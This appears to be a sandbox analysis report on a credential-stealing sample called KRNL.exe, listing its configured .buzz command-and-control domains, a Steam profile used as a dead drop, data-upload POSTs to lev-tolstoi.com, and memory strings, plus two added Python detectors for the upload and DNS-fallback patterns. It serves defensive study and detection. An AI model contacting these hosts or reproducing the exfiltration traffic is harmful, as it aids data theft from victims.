Source: Malware configuration extractor | URLs: mindhandru.buzz
Source: Malware configuration extractor | URLs: prisonyfork.buzz
Source: Malware configuration extractor | URLs: screwamusresz.buzz
Source: Malware configuration extractor | URLs: appliacnesot.buzz
Source: Malware configuration extractor | URLs: inherineau.buzz
Source: Malware configuration extractor | URLs: scentniej.buzz
Source: Malware configuration extractor | URLs: cashfuzysao.buzz
Source: unknown | DNS traffic detected: query: 206.23.85.13.in-addr.arpa reply code: Name error (3)
Source: unknown | DNS traffic detected: query: screwamusresz.buzz reply code: Name error (3)
Source: unknown | DNS traffic detected: query: scentniej.buzz reply code: Name error (3)
Source: unknown | DNS traffic detected: query: prisonyfork.buzz reply code: Name error (3)
Source: unknown | DNS traffic detected: query: hummskitnj.buzz reply code: Name error (3)
Source: unknown | DNS traffic detected: query: mindhandru.buzz reply code: Name error (3)
Source: unknown | DNS traffic detected: query: appliacnesot.buzz reply code: Name error (3)
Source: unknown | DNS traffic detected: query: cashfuzysao.buzz reply code: Name error (3)
Source: unknown | DNS traffic detected: query: rebuildeso.buzz reply code: Name error (3)
Source: unknown | DNS traffic detected: query: inherineau.buzz reply code: Name error (3)
Source: global traffic | TCP traffic: 192.168.2.4:54886 -> 162.159.36.2:53
Source: Joe Sandbox View | IP Address: 172.67.157.254
Source: Joe Sandbox View | IP Address: 104.102.49.254
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.102.49.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 172.67.157.254:443
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 51 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=LC4OYBSII4ZCJL | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 18143 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=GGAL4P5RZVZH | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8752 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=2SZAJ2DN9HSSBMB80 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20435 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=1XSU0JOGY | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1199 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=7HO70WUPW0KCDJFRF2 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 568307 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 86 | Host: lev-tolstoi.com
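The request list above has a recognisable shape: a handful of tiny form-urlencoded POSTs to a single path (/api) interleaved with multipart/form-data POSTs whose bodies grow to hundreds of kilobytes, all carrying a Chrome User-Agent while the multipart boundaries (LC4OYBSII4ZCJL, GGAL4P5RZVZH, ...) are not the `----WebKitFormBoundary` + 16 alphanumerics that Chromium actually emits. The following detection is an added example written for this page, not Joe Sandbox or Suricata code; it re-creates the ten requests listed above as constructed input, and the thresholds (at least two uploads, at least 10 kB uploaded) are assumptions to tune against your own proxy logs.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample: the requests this report lists, in report order, one
# request per string with headers separated by " | ".
UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")
FORM = "application/x-www-form-urlencoded"


def _post(ctype, length, host="lev-tolstoi.com"):
    return (f"POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: {ctype} | "
            f"User-Agent: {UA} | Content-Length: {length} | Host: {host}")


SAMPLE_REQUESTS = [
    f"GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | "
    f"User-Agent: {UA} | Host: steamcommunity.com",
    _post(FORM, 8),
    _post(FORM, 51),
    _post("multipart/form-data; boundary=LC4OYBSII4ZCJL", 18143),
    _post("multipart/form-data; boundary=GGAL4P5RZVZH", 8752),
    _post("multipart/form-data; boundary=2SZAJ2DN9HSSBMB80", 20435),
    _post("multipart/form-data; boundary=1XSU0JOGY", 1199),
    _post("multipart/form-data; boundary=7HO70WUPW0KCDJFRF2", 568307),
    _post(FORM, 86),
]


@dataclass
class Request:
    method: str
    path: str
    headers: dict  # header names lower-cased


def parse_request(line: str) -> Request:
    """Split 'METHOD /path HTTP/x | Name: value | ...' into a Request."""
    parts = [p.strip() for p in line.split(" | ")]
    method, path, _version = parts[0].split(" ", 2)
    headers = {}
    for part in parts[1:]:
        name, _, value = part.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method, path, headers)


_BOUNDARY = re.compile(r"boundary=([^;\s]+)")


def boundary_mismatch(req: Request) -> bool:
    """True when the UA claims Chrome but the multipart boundary is not the
    '----WebKitFormBoundary' + 16 alphanumerics shape Chromium generates.
    A hand-rolled HTTP client forging a browser UA usually gets this wrong."""
    m = _BOUNDARY.search(req.headers.get("content-type", ""))
    if not m or "Chrome/" not in req.headers.get("user-agent", ""):
        return False
    return not re.fullmatch(r"----WebKitFormBoundary[A-Za-z0-9]{16}", m.group(1))


def find_exfil_hosts(lines, min_uploads=2, min_bytes=10_000):
    """Flag hosts that receive a form-urlencoded check-in plus repeated large
    multipart uploads, all to one path. Thresholds are assumed defaults."""
    by_host = defaultdict(list)
    for line in lines:
        req = parse_request(line)
        by_host[req.headers.get("host", "")].append(req)

    def ctype(r):
        return r.headers.get("content-type", "")

    hits = {}
    for host, reqs in by_host.items():
        posts = [r for r in reqs if r.method == "POST"]
        checkins = [r for r in posts if ctype(r).startswith(FORM)]
        uploads = [r for r in posts if ctype(r).startswith("multipart/form-data")]
        total = sum(int(r.headers.get("content-length", "0")) for r in uploads)
        paths = {r.path for r in posts}
        if checkins and len(uploads) >= min_uploads and total >= min_bytes and len(paths) == 1:
            hits[host] = {
                "path": paths.pop(),
                "checkins": len(checkins),
                "uploads": len(uploads),
                "bytes": total,
                "forged_ua": sum(boundary_mismatch(r) for r in uploads),
            }
    return hits


if __name__ == "__main__":
    for host, info in find_exfil_hosts(SAMPLE_REQUESTS).items():
        print(host, info)
```

On the constructed input only lev-tolstoi.com is flagged: three check-ins, five uploads totalling 616,836 bytes to /api, every upload with a boundary that does not match the claimed browser. The Steam GET is ignored because it carries no POST body. The boundary check is the cheap, high-signal part: legitimate browser uploads through a proxy almost never trip it, so it is worth keeping as a standalone rule even where the volume thresholds are too noisy.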
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
Source: KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab. equals www.youtube.com (Youtube)
Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=eb57dd49dd895c3631208604; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveWed, 01 Jan 2025 20:27:59 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: KRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: om/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab. equals www.youtube.com (Youtube)
Source: KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: s://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; o( equals www.youtube.com (Youtube)
Source: KRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: s://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-sr+ equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: mindhandru.buzz
Source: global traffic | DNS traffic detected: DNS query: prisonyfork.buzz
Source: global traffic | DNS traffic detected: DNS query: rebuildeso.buzz
Source: global traffic | DNS traffic detected: DNS query: scentniej.buzz
Source: global traffic | DNS traffic detected: DNS query: inherineau.buzz
Source: global traffic | DNS traffic detected: DNS query: screwamusresz.buzz
Source: global traffic | DNS traffic detected: DNS query: appliacnesot.buzz
Source: global traffic | DNS traffic detected: DNS query: cashfuzysao.buzz
Source: global traffic | DNS traffic detected: DNS query: hummskitnj.buzz
Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic | DNS traffic detected: DNS query: lev-tolstoi.com
Source: global traffic | DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
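Taken together, the DNS records in this report show the sample walking its nine configured .buzz domains, receiving NXDOMAIN for every one, and only then resolving steamcommunity.com and lev-tolstoi.com, the two hosts it went on to talk to. That sequence (a burst of NXDOMAINs concentrated in one TLD, followed by lookups that succeed) is what the "tries to resolve many domain names, but no domain seems valid" signature is keyed on, and it is cheap to reproduce from resolver logs. The script below is an added example for this page, not Joe Sandbox code; it uses the twelve queries listed above as constructed input, the two "No error (0)" replies are assumed from the fact that both hosts were contacted afterwards, and the thresholds (five failures, 80 % in one TLD) are assumptions.

```python
import re
from collections import Counter

# Constructed sample: the twelve queries this report lists, in report order.
# The two "No error (0)" replies are assumed; the report only shows the
# NXDOMAIN answers explicitly.
SAMPLE_DNS_LOG = [
    "query: 206.23.85.13.in-addr.arpa reply code: Name error (3)",
    "query: screwamusresz.buzz reply code: Name error (3)",
    "query: scentniej.buzz reply code: Name error (3)",
    "query: prisonyfork.buzz reply code: Name error (3)",
    "query: hummskitnj.buzz reply code: Name error (3)",
    "query: mindhandru.buzz reply code: Name error (3)",
    "query: appliacnesot.buzz reply code: Name error (3)",
    "query: cashfuzysao.buzz reply code: Name error (3)",
    "query: rebuildeso.buzz reply code: Name error (3)",
    "query: inherineau.buzz reply code: Name error (3)",
    "query: steamcommunity.com reply code: No error (0)",
    "query: lev-tolstoi.com reply code: No error (0)",
]

# "query: <name> reply code: <text> (<rcode>)"; the numeric RCODE is what we key on
_LINE = re.compile(r"query:\s*(\S+)\s+reply code:\s*.*?\((\d+)\)")


def parse_dns_line(line):
    """Return (qname, rcode) for one log line; qname lower-cased, no trailing dot."""
    m = _LINE.search(line)
    if not m:
        raise ValueError(f"unparsable DNS line: {line!r}")
    return m.group(1).rstrip(".").lower(), int(m.group(2))


def is_reverse_lookup(name):
    """PTR lookups fail all the time for legitimate reasons; keep them out of the count."""
    return name.endswith(".in-addr.arpa") or name.endswith(".ip6.arpa")


def dead_domain_fallback(lines, min_failures=5, min_tld_share=0.8):
    """Detect a burst of NXDOMAIN answers concentrated in one TLD followed by
    lookups that succeed: the shape of a stealer walking a hard-coded C2 list
    and falling through to a reachable host. Thresholds are assumed defaults.
    Returns None when the pattern is absent."""
    events = [parse_dns_line(line) for line in lines]
    failed = [n for n, rc in events if rc == 3 and not is_reverse_lookup(n)]
    if len(failed) < min_failures:
        return None
    tld, count = Counter(n.rsplit(".", 1)[-1] for n in failed).most_common(1)[0]
    if count / len(failed) < min_tld_share:
        return None
    first_fail = next(i for i, (n, rc) in enumerate(events)
                      if rc == 3 and not is_reverse_lookup(n))
    # Anything that resolved after the first dead domain is a fallback candidate
    # and belongs in the same alert so the analyst sees where the host went next.
    fallback = [n for n, rc in events[first_fail:] if rc == 0]
    return {"nxdomain": failed, "dominant_tld": tld, "fallback_hosts": fallback}


if __name__ == "__main__":
    print(dead_domain_fallback(SAMPLE_DNS_LOG))
```

Run against the constructed log it returns the nine .buzz names as the dead set, `buzz` as the dominant TLD, and steamcommunity.com and lev-tolstoi.com as the fallback hosts; the in-addr.arpa failure is excluded from the count. The TLD-share check is what keeps ordinary NXDOMAIN noise (typos, stale CNAMEs, expired CDN names spread across many TLDs) from firing; the fallback list is what makes the alert actionable, since the next resolvable name is usually the live C2 or a dead-drop resolver.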
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: lev-tolstoi.com
Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:27060
Source: KRNL.exe | String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: KRNL.exe, 00000002.00000003.1737060730.0000000005A76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: KRNL.exe, 00000002.00000003.1737060730.0000000005A76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: KRNL.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: KRNL.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: KRNL.exe | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: KRNL.exe | String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: KRNL.exe, 00000002.00000003.1737060730.0000000005A76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: KRNL.exe, 00000002.00000003.1737060730.0000000005A76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: KRNL.exe, 00000002.00000003.1737060730.0000000005A76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: KRNL.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: KRNL.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: KRNL.exe, 00000002.00000003.1737060730.0000000005A76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: KRNL.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: KRNL.exe, 00000002.00000003.1737060730.0000000005A76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: KRNL.exe | String found in binary or memory: http://ocsp.digicert.com0
Source: KRNL.exe | String found in binary or memory: http://ocsp.digicert.com0A
Source: KRNL.exe | String found in binary or memory: http://ocsp.entrust.net02
Source: KRNL.exe | String found in binary or memory: http://ocsp.entrust.net03
Source: KRNL.exe, 00000002.00000003.1737060730.0000000005A76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710324005.00000000033DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710324005.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710324005.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: KRNL.exe | String found in binary or memory: http://www.digicert.com/CPS0
Source: KRNL.exe | String found in binary or memory: http://www.entrust.net/rpa03
Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: KRNL.exe, 00000002.00000003.1737060730.0000000005A76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: KRNL.exe, 00000002.00000003.1737060730.0000000005A76000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: KRNL.exe, 00000002.00000003.1711060415.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711461120.0000000005A89000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.steampowered.com/
Source: KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: KRNL.exe, 00000002.00000003.1738159372.0000000005A44000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: KRNL.exe, 00000002.00000003.1738159372.0000000005A44000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: KRNL.exe, 00000002.00000003.1711060415.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711461120.0000000005A89000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: KRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.fastly.
Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: KRNL.exe, 00000002.00000003.1711060415.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711461120.0000000005A89000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: KRNL.exe, 00000002.00000003.1711060415.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711461120.0000000005A89000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
